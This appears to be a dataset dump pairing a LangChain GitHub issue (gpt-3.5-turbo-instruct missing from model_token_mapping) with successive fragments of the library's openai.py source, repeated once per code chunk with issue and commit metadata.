>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | for _prompts in sub_prompts:
if self.streaming:
if len(_prompts) > 1:
raise ValueError("Cannot stream results with multiple prompts.")
generation: Optional[GenerationChunk] = None
for chunk in self._stream(_prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
choices.append(
{
"text": generation.text,
"finish_reason": generation.generation_info.get("finish_reason")
if generation.generation_info
else None,
"logprobs": generation.generation_info.get("logprobs")
if generation.generation_info
else None,
}
)
else:
response = completion_with_retry(
self, prompt=_prompts, run_manager=run_manager, **params
)
choices.extend(response["choices"])
update_token_usage(_keys, response, token_usage)
return self.create_llm_result(choices, prompts, token_usage)
async def _agenerate( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
"""Call out to OpenAI's endpoint async with k unique prompts."""
params = self._invocation_params
params = {**params, **kwargs}
sub_prompts = self.get_sub_prompts(params, prompts, stop)
choices = []
token_usage: Dict[str, int] = {}
# Ge
# In
_keys = {"completion_tokens", "prompt_tokens", "total_tokens"}
for _prompts in sub_prompts:
if self.streaming: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | if len(_prompts) > 1:
raise ValueError("Cannot stream results with multiple prompts.")
generation: Optional[GenerationChunk] = None
async for chunk in self._astream(
_prompts[0], stop, run_manager, **kwargs
):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
choices.append(
{
"text": generation.text,
"finish_reason": generation.generation_info.get("finish_reason")
if generation.generation_info
else None,
"logprobs": generation.generation_info.get("logprobs")
if generation.generation_info
else None,
}
)
else:
response = await acompletion_with_retry(
self, prompt=_prompts, run_manager=run_manager, **params
)
choices.extend(response["choices"])
update_token_usage(_keys, response, token_usage)
return self.create_llm_result(choices, prompts, token_usage)
def get_sub_prompts( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self,
params: Dict[str, Any],
prompts: List[str],
stop: Optional[List[str]] = None,
) -> List[List[str]]:
"""Get the sub prompts for llm call."""
if stop is not None:
if "stop" in params:
raise ValueError("`stop` found in both the input and default params.")
params["stop"] = stop
if params["max_tokens"] == -1:
if len(prompts) != 1:
raise ValueError(
"max_tokens set to -1 not supported for multiple inputs."
)
params["max_tokens"] = self.max_tokens_for_prompt(prompts[0])
sub_prompts = [
prompts[i : i + self.batch_size]
for i in range(0, len(prompts), self.batch_size)
]
return sub_prompts
def create_llm_result( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | self, choices: Any, prompts: List[str], token_usage: Dict[str, int]
) -> LLMResult:
"""Create the LLMResult from the choices and prompts."""
generations = []
for i, _ in enumerate(prompts):
sub_choices = choices[i * self.n : (i + 1) * self.n]
generations.append(
[
Generation(
text=choice["text"],
generation_info=dict(
finish_reason=choice.get("finish_reason"),
logprobs=choice.get("logprobs"),
),
)
for choice in sub_choices
]
)
llm_output = {"token_usage": token_usage, "model_name": self.model_name}
return LLMResult(generations=generations, llm_output=llm_output)
@property
def _invocation_params(self) -> Dict[str, Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Get the parameters used to invoke the model."""
openai_creds: Dict[str, Any] = {
"api_key": self.openai_api_key,
"api_base": self.openai_api_base,
"organization": self.openai_organization,
}
if self.openai_proxy:
import openai
openai.proxy = {"http": self.openai_proxy, "https": self.openai_proxy} # ty
return {**openai_creds, **self._default_params}
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
def _llm_type(self) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Return type of llm."""
return "openai"
def get_token_ids(self, text: str) -> List[int]:
"""Get the token IDs using the tiktoken package."""
# ti
if sys.version_info[1] < 8:
return super().get_num_tokens(text)
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to calculate get_num_tokens. "
"Please install it with `pip install tiktoken`."
)
model_name = self.tiktoken_model_name or self.model_name
try:
enc = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
enc = tiktoken.get_encoding(model)
return enc.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
@staticmethod
def modelname_to_contextsize(modelname: str) -> int: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Calculate the maximum number of tokens possible to generate for a model.
Args:
modelname: The modelname we want to know the context size for.
Returns:
The maximum context size
Example:
.. code-block:: python
max_tokens = openai.modelname_to_contextsize("text-davinci-003")
"""
model_token_mapping = {
"gpt-4": 8192,
"gpt-4-0314": 8192,
"gpt-4-0613": 8192,
"gpt-4-32k": 32768,
"gpt-4-32k-0314": 32768,
"gpt-4-32k-0613": 32768,
"gpt-3.5-turbo": 4096, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | "gpt-3.5-turbo-0301": 4096,
"gpt-3.5-turbo-0613": 4096,
"gpt-3.5-turbo-16k": 16385,
"gpt-3.5-turbo-16k-0613": 16385,
"text-ada-001": 2049,
"ada": 2049,
"text-babbage-001": 2040,
"babbage": 2049,
"text-curie-001": 2049,
"curie": 2049,
"davinci": 2049,
"text-davinci-003": 4097,
"text-davinci-002": 4097,
"code-davinci-002": 8001,
"code-davinci-001": 8001,
"code-cushman-002": 2048,
"code-cushman-001": 2048,
}
# ha
if "ft-" in modelname:
modelname = modelname.split(":")[0]
context_size = model_token_mapping.get(modelname, None)
if context_size is None:
raise ValueError(
f"Unknown model: {modelname}. Please provide a valid OpenAI model name."
"Known models are: " + ", ".join(model_token_mapping.keys())
)
return context_size
@property
def max_context_size(self) -> int: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Get max context size for this model."""
return self.modelname_to_contextsize(self.model_name)
def max_tokens_for_prompt(self, prompt: str) -> int:
"""Calculate the maximum number of tokens possible to generate for a prompt.
Args:
prompt: The prompt to pass into the model.
Returns:
The maximum number of tokens to generate for a prompt.
Example:
.. code-block:: python
max_tokens = openai.max_token_for_prompt("Tell me a joke.")
"""
num_tokens = self.get_num_tokens(prompt)
return self.max_context_size - num_tokens
class OpenAI(BaseOpenAI):
"""OpenAI large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import OpenAI
openai = OpenAI(model_name="text-davinci-003")
"""
@property
def _invocation_params(self) -> Dict[str, Any]:
return {**{"model": self.model_name}, **super()._invocation_params}
class AzureOpenAI(BaseOpenAI): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | """Azure-specific OpenAI large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import AzureOpenAI
openai = AzureOpenAI(model_name="text-davinci-003")
"""
deployment_name: str = ""
"""Deployment name to use."""
openai_api_type: str = ""
openai_api_version: str = ""
@root_validator()
def validate_azure_settings(cls, values: Dict) -> Dict:
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
)
values["openai_api_type"] = get_from_dict_or_env(
values, "openai_api_type", "OPENAI_API_TYPE", "azure"
)
return values
@property
def _identifying_params(self) -> Mapping[str, Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
